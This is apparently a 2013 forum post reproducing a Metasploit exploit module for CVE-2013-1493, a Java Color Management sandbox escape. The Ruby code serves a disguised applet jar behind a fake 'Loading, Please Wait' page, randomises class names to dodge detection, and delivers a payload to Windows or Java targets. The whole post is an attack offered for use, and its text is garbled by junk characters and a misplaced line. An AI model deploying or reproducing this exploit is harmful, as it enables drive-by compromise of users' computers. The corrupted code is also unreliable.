##8 z6 u& V6 L$ ^% s p' f
$ {$ t0 o. ~' l7 f! n# This file is part of the Metasploit Framework and may be subject to: ~ X. v1 y# K: Q
# redistribution and commercial restrictions. Please see the Metasploit
, w3 ~# x/ p0 p$ `1 U) r# web site for more information on licensing and terms of use.7 s: g4 t: Q' h( A1 K7 N
# http://metasploit.com/( t6 |" L" A% j& j" @5 Y
##3 i/ k1 E: ~ m- R7 V7 |* g
require ‘msf/core’
6 l! _/ k' y3 V4 T Xrequire ‘rex’
5 U; E4 s9 X" ]2 R* f, {5 `2 pclass Metasploit3 < Msf::Exploit::Remote
5 Z0 X- O; Y; O1 ARank = NormalRanking( u- L- _$ R* q+ n) U0 C
include Msf::Exploit::Remote::HttpServer::HTML
$ _+ F3 I, D* \: k7 }4 k; P, I2 kinclude Msf::Exploit::EXE
# @2 m+ d" l1 a5 Y) U- xinclude Msf::Exploit::Remote::BrowserAutopwn4 p$ ~6 W+ ]( L0 R0 O
autopwn_info({ :javascript => false })
6 ?' u; s/ z2 S" b" Vdef initialize( info = {} )
) d5 B6 O' A) ?% Z) s _super( update_info( info,( g" `/ R; U$ \2 e5 _% y" K, A2 O
‘Name’ => ‘Java CMM Remote Code Execution’,. N! |& A6 o0 g1 D: P
‘Description’ => %q{& p3 u& u* [, u
This module abuses the Color Management classes from a Java Applet to run
5 x8 m/ G- k2 T% w6 E+ earbitrary Java code outside of the sandbox as exploited in the wild in February/ Z5 \2 J# y/ t9 O
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
$ D" j& S2 T+ \! x4 Land earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1, {% M0 E- _, n8 E
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java9 T7 q. D: k& z# s& F, p: n
warning in order to run the malicious applet.6 |( w2 I) h* C \
},* E4 E, |2 f( S% P1 B* z
‘License’ => MSF_LICENSE,. A: }* p; L! ]' M* D8 C. B" X
‘Author’ =>
2 V5 c! J# O, _8 k* D3 H8 z'Unknown', # Vulnerability discovery and Exploit) s' o0 z: y& L
'juan vazquez' # Metasploit module (just ported the published exploit)# J, B9 V5 X m2 A/ E: b
],7 w9 }0 N$ z f8 A |! T0 c
‘References’ =>9 |6 i5 j/ x( f6 y# P9 p
[
! P9 e& @1 l6 g; g- E/ N# @9 J. I[ 'CVE', '2013-1493' ],
9 |* m u) g; c0 C/ J; \. {( F[ 'OSVDB', '90737' ],; u4 X/ J$ Q$ Z# Z/ \& E
[ 'BID', '58238' ],, h) m# e# C) u0 |6 N
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
' _" A" V( n0 q- b& c) x; _[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
) N; g7 J* Z7 q[ 'URL', 'http://pastie.org/pastes/6581034' ]
. y6 [- f. ?" S+ D3 m2 Y/ p8 C* I],
% S% a' H: M) E* R0 T‘Platform’ => [ 'win', 'java' ],
- @' C/ O# ]& F‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },' l" j1 x8 A6 i. ^
‘Targets’ =>
% P* P6 c( R0 y+ S8 t[& l" M" P3 N& C1 |* X
[ 'Generic (Java Payload)',
7 J7 t9 ~' G1 Z* |/ G{1 m8 z. {% y0 M. N# R9 ~2 q
'Platform' => 'java',
: ~" X+ p% i; z" N'Arch' => ARCH_JAVA
! v1 Z7 W0 G0 [}/ |0 [! g! @7 s. p
],9 D# l8 u$ `9 r. ]& f
[ 'Windows x86 (Native Payload)',
3 Z1 Y$ K9 a1 R% c: K* Q0 |+ M{$ I& s1 i0 \5 Q$ i8 X
'Platform' => 'win',$ X. ^7 ]( A( [
'Arch' => ARCH_X863 T! `# f y. ~. T
}
/ K/ o& G( e8 z; P4 l9 ]1 V8 H; }6 L]
1 K5 M p. Q: r],
' ]% k" l1 Y* u+ F1 g‘‘DisclosureDate’ => ‘Mar 01 2013′
1 L! p) A: E& h$ |4 V& }; x))
1 [1 x* l& W {" E/ l5 fend; k' j* Q* A# }. i1 [3 F0 o7 S
def setup# U1 z0 ^5 F; ^/ B
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”). L0 B; N3 K5 t5 y* X; D
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
, m/ h+ I( B' z5 U3 K6 e0 U' Ypath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
1 V5 U: j2 e; r+ E@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }9 D' s9 w6 P) a2 p% |
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)' L; S# Z( q' ]+ y& ^ ^
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
! A& G$ V( S: p+ ^5 I* K4 Fpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
/ U, d$ d( b2 U% a: M' U* i@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
& s/ j6 E5 n9 W9 Q@init_class_name = rand_text_alpha(“Init”.length)' A+ }& B/ t( ?+ \' w5 p6 h- j
@init_class.gsub!(“Init”, @init_class_name)
- t& ~: O' i# n' e0 ]: Vsuper
& [& } b$ B V6 U) o- _1 I/ B9 wend
; ~7 c8 U, ]! M5 b0 [1 J: o' Ydef on_request_uri(cli, request), \' o( l% N s9 o
print_status(“handling request for #{request.uri}”)( }: f+ e* p) [: Y# X
case request.uri0 T9 P2 \. L: u( ]. J, H2 P
when /\.jar$/i" r9 ^8 G* @2 ^0 }( O
jar = payload.encoded_jar
, |7 [5 l6 {7 e% [6 Gjar.add_file(“#{@init_class_name}.class”, @init_class)0 q" l: H9 L9 V' L5 [" K
jar.add_file(“Leak.class”, @leak_class)
6 ]( [( N% e1 q' G% z, pjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
" f' d/ j2 t% _9 X: d1 Jjar.add_file(“MyColorSpace.class”, @color_space_class)+ q/ f( a3 D! a. s6 w
DefaultTarget’ => 1,$ ], r5 s2 q# I2 P: l9 P
metasploit_str = rand_text_alpha(“metasploit”.length)! A+ H" R7 U6 t' X* X X
payload_str = rand_text_alpha(“payload”.length)4 J- |7 h) a5 R$ M' V* L9 ^8 _
jar.entries.each { |entry|6 b( K0 H5 U0 `) H) P z
entry.name.gsub!(“metasploit”, metasploit_str)) [. A6 B3 x* b
entry.name.gsub!(“Payload”, payload_str)
; j" i) `1 S% I& U3 c8 centry.data = entry.data.gsub(“metasploit”, metasploit_str)( x' P- [) ~( M/ [$ H
entry.data = entry.data.gsub(“Payload”, payload_str) X0 x2 I1 S3 n/ A: X
}
, {! `% f: H. ]# m( \$ Ajar.build_manifest
& N8 \9 @; q4 X/ c" Y' [7 vsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
, g$ [% A3 s! {# |6 u0 Y: x" iwhen /\/$/ V6 g5 T; y% h0 b/ M
payload = regenerate_payload(cli)8 o$ T9 Z* X7 p6 h) t' }
if not payload" ]/ ^3 E/ @; T" l: z, j# c( _: Q
print_error(“Failed to generate the payload.”)7 z0 H2 A4 D3 K( s
send_not_found(cli)
4 l% \" P/ p- |- ?% l8 Zreturn/ @2 K- z( W' b2 a# w5 T7 v
end
9 h; P3 q+ b9 m! t3 S' T( |: I6 rsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
$ P+ B8 [4 t3 Q/ L" q) Felse: T. F5 t* a4 C; Z! L
send_redirect(cli, get_resource() + ‘/’, ”)
: G3 [; R: R- n+ @$ u Uend! N' G! C' d& G! ^
end1 U; P( H4 g7 j0 ~5 I
def generate_html/ ~4 `/ J1 {. H3 A! P# _; K
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
! M+ e1 `+ U2 C, O0 Y4 j# T( xhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|- r1 \0 M5 U. ]* f
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|: E: j8 I& |" [0 C3 H5 L
html += %Q|</applet></body></html>|) V7 d& b) d, C! r& S' }7 L
return html
6 g/ }0 G' u2 ]end0 `. h6 S5 y+ ]+ R6 Q/ }
end
* s! K) n$ T/ ]5 w, ~$ s" lend
) |8 I; v2 P) r/ j) [ |
发表于 2013-4-4 17:31:17
收藏
支持
反对